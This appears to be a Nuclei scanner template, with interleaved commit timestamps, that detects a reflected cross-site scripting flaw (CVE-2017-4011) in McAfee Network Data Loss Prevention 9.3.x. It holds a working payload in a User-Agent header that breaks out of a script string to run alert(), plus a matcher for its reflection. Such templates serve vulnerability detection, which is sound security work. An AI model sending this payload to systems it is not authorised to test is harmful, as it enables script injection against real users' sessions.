2021-08-20 21:00:02 +00:00
id : CVE-2017-4011
2021-08-16 20:45:09 +00:00
info :
2022-08-16 14:14:41 +00:00
name : McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting
2021-08-17 11:31:34 +00:00
author : geeknik
severity : medium
2022-08-16 14:14:41 +00:00
description : McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized access to sensitive information.
2023-09-06 13:22:34 +00:00
remediation : |
Apply the latest security patches or updates provided by McAfee to mitigate the XSS vulnerability.
2021-08-16 20:45:09 +00:00
reference :
- https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
2021-08-17 11:31:34 +00:00
- https://kc.mcafee.com/corporate/index?page=content&id=SB10198
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-4011
2023-07-11 19:49:27 +00:00
- http://www.securitytracker.com/id/1038523
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-4011
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00142
2024-03-23 09:28:19 +00:00
epss-percentile : 0.49103
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : mcafee
product : network_data_loss_prevention
tags : cve,cve2017,mcafee,xss
2021-08-16 20:45:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-08-16 20:45:09 +00:00
- method : GET
path :
- "{{BaseURL}}"
2023-07-11 19:49:27 +00:00
2021-08-16 20:45:09 +00:00
headers :
User-Agent : Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//
matchers-condition : and
matchers :
- type : word
part : body
words :
- "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"
2021-08-17 11:31:34 +00:00
2021-08-16 20:45:09 +00:00
- type : word
part : header
words :
- "text/html"
2024-03-25 11:57:16 +00:00
# digest: 4a0a00473045022100b96f472aaedfc274fdfdec8a3b816d78acbc2505300b1d40c565b457822a0cce0220437e462685b9f8c0bc91b355e244b8882fb26379f7d5f3c244f591b218cac549:922c64590222798bb761d5b6d8e72950